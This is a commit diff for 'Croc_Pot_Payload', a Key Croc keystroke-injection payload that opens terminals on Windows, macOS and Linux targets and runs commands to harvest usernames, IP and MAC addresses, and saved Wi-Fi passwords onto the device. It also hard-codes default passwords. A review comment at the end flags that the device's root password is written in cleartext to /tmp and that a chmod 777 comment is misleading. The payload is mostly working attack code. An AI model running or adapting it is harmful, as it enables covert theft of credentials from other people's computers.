Update Croc_Pot_Payload.txt

pull/23/head
spywill 2021-09-19 08:36:49 -04:00 committed by GitHub
parent c27799b620
commit 2d9753cca4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 305 additions and 221 deletions


@ -1,238 +1,322 @@
# Title: Croc_Pot Payload # Title: Croc_Pot Payload
# Description: Start Croc_pot.sh bash script automatically, scan takes about 30-40 sec to start because of OS detection # Description: Start Croc_pot.sh bash script automatically, scan takes about 30-40 sec to start because of OS detection
# This will collect some data like (ip address, current user name, pc host name, ssid and passwd, mac address) # This will collect some data off target PC
# (ip address, current user name, pc host name, ssid and passwd, mac address)
# save to tools/Croc_pot folder # save to tools/Croc_pot folder
# Author: Spywill # Author: Spywill
# Version: 1.1 # Version: 1.2
# Category: Key Croc # Category: Key Croc
#
#
MATCH crocpot MATCH crocpot
#
CROC_PW=hak5croc #<-----Edit KEYCROC_PASSWD_HERE #---> Edit KEYCROC_PASSWD_HERE
PC_PW=LINUX #<-----Edit LINUX-PC_PASSWD_HERE CROC_PW=hak5croc
#---> Edit LINUX-PC_PASSWD_HERE
PC_PW=LINUX
#---> Save keycroc passwd in temp folder
#---> This is used for starting Reverse SSH Tunnel with Target PC
echo "${CROC_PW}" >> /tmp/CPW.txt echo "${CROC_PW}" >> /tmp/CPW.txt
#
#---> Payload variable/remove existing OS detection
CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt
cat > ${CROC_OS} cat > ${CROC_OS}
rm /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt rm /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt
#---> Enter ethernet mode for OS detection
ATTACKMODE AUTO_ETHERNET ATTACKMODE AUTO_ETHERNET
LED ATTACK LED ATTACK
#---> Keycroc built in functions to retrieve target PC Loot
GET TARGET_OS GET TARGET_OS
GET TARGET_IP GET TARGET_IP
GET HOST_IP GET HOST_IP
GET TARGET_HOSTNAME GET TARGET_HOSTNAME
#---> After OS detection case TARGET_OS value
case $TARGET_OS in case $TARGET_OS in
WINDOWS) WINDOWS)
LED R LED R
ATTACKMODE HID STORAGE #---> Enter Storage mode on keycroc
sleep 1 ATTACKMODE HID STORAGE
Q GUI r sleep 1
sleep 1 #---> Start windows powershell
Q STRING "powershell" Q GUI r
Q ENTER sleep 1
sleep 5 Q STRING "powershell"
Q STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)" Q ENTER
Q ENTER sleep 5
sleep 1 #---> Place keycroc usb drive into variable
Q STRING "\$env:UserName | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append" Q STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)"
Q ENTER Q ENTER
sleep 1 sleep 1
Q STRING "Get-CimInstance -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=\$true | Select-Object -ExpandProperty IPAddress | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append" #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q ENTER Q STRING "\$env:UserName | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
sleep 1 Q ENTER
Q STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append" sleep 1
Q ENTER #---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
sleep 2 Q STRING "Get-CimInstance -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=\$true | Select-Object -ExpandProperty IPAddress | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q STRING "wmic nic where PhysicalAdapter=True get MACAddress,Name | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append" Q ENTER
Q ENTER sleep 1
sleep 3 #---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "[System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append" Q STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q ENTER Q ENTER
sleep 3 sleep 2
ATTACKMODE HID #---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
sleep 1 Q STRING "wmic nic where PhysicalAdapter=True get MACAddress,Name | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" Q ENTER
Q ENTER sleep 3
sleep 2 #---> Retrieve Shark Jack IP if connected to local network as keycroc & save to tools/Croc_Pot/shark_ip.txt
Q STRING "${CROC_PW}" Q STRING "[System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append"
Q ENTER Q ENTER
sleep 2 sleep 3
echo "$TARGET_OS" >> ${CROC_OS} #---> Return back to ATTACKMODE HID mode
echo "$TARGET_IP" >> ${CROC_OS} ATTACKMODE HID
echo "$TARGET_HOSTNAME" >> ${CROC_OS} sleep 1
echo "$HOST_IP" >> ${CROC_OS} #---> Start SSH session with target PC
$(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt) Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
$(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt) Q ENTER
Q STRING "/root/udisk/tools/Croc_Pot.sh" sleep 2
Q ENTER;; #---> Entering keycroc passwd
MACOS) Q STRING "${CROC_PW}"
ATTACKMODE HID Q ENTER
LED G sleep 2
sleep 1 #---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
Q GUI-SPACE echo "$TARGET_OS" >> ${CROC_OS}
sleep 1 echo "$TARGET_IP" >> ${CROC_OS}
Q STRING "terminal" echo "$TARGET_HOSTNAME" >> ${CROC_OS}
Q ENTER echo "$HOST_IP" >> ${CROC_OS}
sleep 2 #---> Edit with sed to remove powershell output "r" endlines & remove first character
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" $(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt)
Q ENTER $(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt)
sleep 2 #---> Starting Croc_Pot
Q STRING "${CROC_PW}" Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER Q ENTER ;;
sleep 1 MACOS)
echo "$TARGET_OS" >> ${CROC_OS} #---> Return back to ATTACKMODE HID mode
echo "$TARGET_IP" >> ${CROC_OS} ATTACKMODE HID
echo "$TARGET_HOSTNAME" >> ${CROC_OS} LED G
echo "$HOST_IP" >> ${CROC_OS} sleep 1
Q STRING "/root/udisk/tools/Croc_Pot.sh" #---> Start mac os terminal
Q ENTER;; Q GUI-SPACE
LINUX) sleep 1
ATTACKMODE HID STORAGE Q STRING "terminal"
LED B Q ENTER
sleep 3 sleep 2
case $TARGET_HOSTNAME in #---> Start SSH session with target PC
raspberrypi) Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q GUI d Q ENTER
sleep 1 sleep 2
Q STRING "terminal" #---> Entering keycroc passwd
Q ENTER Q STRING "${CROC_PW}"
Q ENTER Q ENTER
sleep 2 sleep 1
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" #---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
Q ENTER echo "$TARGET_OS" >> ${CROC_OS}
Q STRING "whoami | tee \${PC_USER}" echo "$TARGET_IP" >> ${CROC_OS}
Q ENTER echo "$TARGET_HOSTNAME" >> ${CROC_OS}
sleep 1 echo "$HOST_IP" >> ${CROC_OS}
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}" #---> Starting Croc_Pot
Q ENTER Q STRING "/root/udisk/tools/Croc_Pot.sh"
sleep 1 Q ENTER ;;
Q STRING "sed -n '/ssid\|psk/,+1p' /etc/wpa_supplicant/wpa_supplicant.conf | sed -e 's/[\"]//g' | tee -a \${PC_USER}" LINUX)
Q ENTER #---> Enter Storage mode on keycroc
sleep 1 ATTACKMODE HID STORAGE
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}" LED B
Q ENTER sleep 3
sleep 2 #---> After TARGET_HOSTNAME scan case TARGET_HOSTNAME value
Q STRING "ping -c1 -w3 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" case $TARGET_HOSTNAME in
Q ENTER raspberrypi)
sleep 2 #---> Start Raspberry pi 4 terminal -->gnome-terminal installed<--
ATTACKMODE HID Q GUI d
sleep 1 sleep 1
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" Q STRING "terminal"
Q ENTER Q ENTER
sleep 2 Q ENTER
Q STRING "${CROC_PW}" sleep 2
Q ENTER #---> Place keycroc usb drive into variable
echo "$TARGET_OS" | tee -a ${CROC_OS} Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
echo "$TARGET_IP" | tee -a ${CROC_OS} Q ENTER
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS} #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
echo "$HOST_IP" | tee -a ${CROC_OS} Q STRING "whoami | tee \${PC_USER}"
Q STRING "/root/udisk/tools/Croc_Pot.sh" Q ENTER
Q ENTER;; sleep 1
parrot) #---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q ALT F2 Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
sleep 1 Q ENTER
Q STRING "mate-terminal" sleep 1
Q ENTER #---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
sleep 1 Q STRING "sed -n '/ssid\|psk/,+1p' /etc/wpa_supplicant/wpa_supplicant.conf | sed -e 's/[\"]//g' | tee -a \${PC_USER}"
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/" Q ENTER
Q ENTER sleep 1
Q STRING "${PC_PW}" #---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q ENTER Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
sleep 1 Q ENTER
Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0" sleep 2
Q ENTER #---> Retrieve Shark Jack IP if connected to local network as keycroc & save to tools/Croc_Pot/shark_ip.txt
sleep 1 Q STRING "ping -c1 -w3 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/" Q ENTER
Q ENTER sleep 2
sleep 1 #---> Return back to ATTACKMODE HID mode
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" ATTACKMODE HID
Q ENTER sleep 1
Q STRING "whoami | tee \${PC_USER}" #---> Start SSH session with target PC
Q ENTER Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
sleep 1 Q ENTER
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}" sleep 2
Q ENTER #---> Entering keycroc passwd
sleep 1 Q STRING "${CROC_PW}"
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | tee -a \${PC_USER}" Q ENTER
Q ENTER #---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
sleep 1 echo "$TARGET_OS" | tee -a ${CROC_OS}
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}" echo "$TARGET_IP" | tee -a ${CROC_OS}
Q ENTER echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
sleep 1 echo "$HOST_IP" | tee -a ${CROC_OS}
Q STRING "ping -c1 -w3 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" #---> Starting Croc_Pot
Q ENTER Q STRING "/root/udisk/tools/Croc_Pot.sh"
sleep 2 Q ENTER ;;
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/" parrot)
Q ENTER #---> Start mate-terminal -->Parrot OS<--
sleep 1 Q ALT F2
ATTACKMODE HID sleep 1
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/" Q STRING "mate-terminal"
Q ENTER Q ENTER
sleep 2 sleep 1
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" #---> Create keycroc directory
Q ENTER Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/"
sleep 1 Q ENTER
Q STRING "${CROC_PW}" #---> Entering Linux passwd
Q ENTER Q STRING "${PC_PW}"
echo "$TARGET_OS" | tee -a ${CROC_OS} Q ENTER
echo "$TARGET_IP" | tee -a ${CROC_OS} sleep 1
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS} #---> Mount keycroc usb drive to target pc
echo "$HOST_IP" | tee -a ${CROC_OS} Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0"
Q STRING "/root/udisk/tools/Croc_Pot.sh" Q ENTER
Q ENTER;; sleep 1
*) #---> Make KeyCroc folder executable
Q ALT F2 Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/"
sleep 1 Q ENTER
Q STRING "xterm" sleep 1
Q ENTER #---> Place keycroc usb drive into variable
sleep 1 Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/" Q ENTER
Q ENTER #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "${PC_PW}" Q STRING "whoami | tee \${PC_USER}"
Q ENTER Q ENTER
sleep 1 sleep 1
Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0" #---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q ENTER Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
sleep 1 Q ENTER
Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/" sleep 1
Q ENTER #---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
sleep 1 Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | tee -a \${PC_USER}"
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" Q ENTER
Q ENTER sleep 1
Q STRING "whoami | tee \${PC_USER}" #---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q ENTER Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
sleep 1 Q ENTER
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}" sleep 1
Q ENTER #---> Retrieve Shark Jack IP if connected to local network as keycroc & save to tools/Croc_Pot/shark_ip.txt
sleep 1 Q STRING "ping -c1 -w3 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | tee -a \${PC_USER}" Q ENTER
Q ENTER sleep 2
sleep 1 #---> Unmount keycroc usb drive
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}" Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
Q ENTER Q ENTER
sleep 1 sleep 1
Q STRING "ping -c1 -w3 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" #---> Return back to ATTACKMODE HID mode
Q ENTER ATTACKMODE HID
sleep 2 #---> Remove keycroc directory off target pc
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/" Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
Q ENTER Q ENTER
sleep 1 sleep 2
ATTACKMODE HID #---> Start SSH session with target PC
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/" Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER Q ENTER
sleep 2 sleep 1
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" #---> Entering keycroc passwd
Q ENTER Q STRING "${CROC_PW}"
sleep 1 Q ENTER
Q STRING "${CROC_PW}" #---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
Q ENTER echo "$TARGET_OS" | tee -a ${CROC_OS}
echo "$TARGET_OS" | tee -a ${CROC_OS} echo "$TARGET_IP" | tee -a ${CROC_OS}
echo "$TARGET_IP" | tee -a ${CROC_OS} echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS} echo "$HOST_IP" | tee -a ${CROC_OS}
echo "$HOST_IP" | tee -a ${CROC_OS} #---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh" Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER;; Q ENTER ;;
esac *)
;; #---> Start linux distributions terminal xterm
esac #---> Unsure of which linux distribution this will work on
Q ALT F2
sleep 1
Q STRING "xterm"
Q ENTER
sleep 1
#---> Create keycroc directory
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/"
Q ENTER
#---> Entering Linux passwd
Q STRING "${PC_PW}"
Q ENTER
sleep 1
#---> Mount keycroc usb drive to target pc
Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0"
Q ENTER
sleep 1
#---> Make KeyCroc folder executable
Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/"
Q ENTER
sleep 1
#---> Place keycroc usb drive into variable
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q ENTER
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "whoami | tee \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | tee -a \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve Shark Jack IP if connected to local network as keycroc & save to tools/Croc_Pot/shark_ip.txt
Q STRING "ping -c1 -w3 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER
sleep 2
#---> Unmount keycroc usb drive
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
Q ENTER
sleep 1
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
#---> Remove keycroc directory off target pc
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
Q ENTER
sleep 2
#---> Start SSH session with target PC
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER
sleep 1
#---> Entering keycroc passwd
Q STRING "${CROC_PW}"
Q ENTER
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
echo "$TARGET_OS" | tee -a ${CROC_OS}
echo "$TARGET_IP" | tee -a ${CROC_OS}
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
echo "$HOST_IP" | tee -a ${CROC_OS}
#---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER ;;
esac
;;
esac
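Review bot: The `echo "${CROC_PW}" >> /tmp/CPW.txt` line near the top of the payload appends the device's root password in cleartext to a fixed /tmp path on every `crocpot` match, and the two comments this commit adds above it only document that without changing it. Nothing visible in this file restricts the file's mode or removes it afterwards, so the credential (the hard-coded `hak5croc` value unless edited) stays on disk and gains a duplicate line on each run; whether Croc_Pot.sh cleans it up cannot be seen from this page. Writing it once with a restrictive mode would be safer, e.g. `( umask 077; printf '%s\n' "${CROC_PW}" > /tmp/CPW.txt )`, with the consumer deleting the file after reading it. Separately, the added comment `Make KeyCroc folder executable` misdescribes `chmod 777`, which makes the mount point world-writable, and should say so.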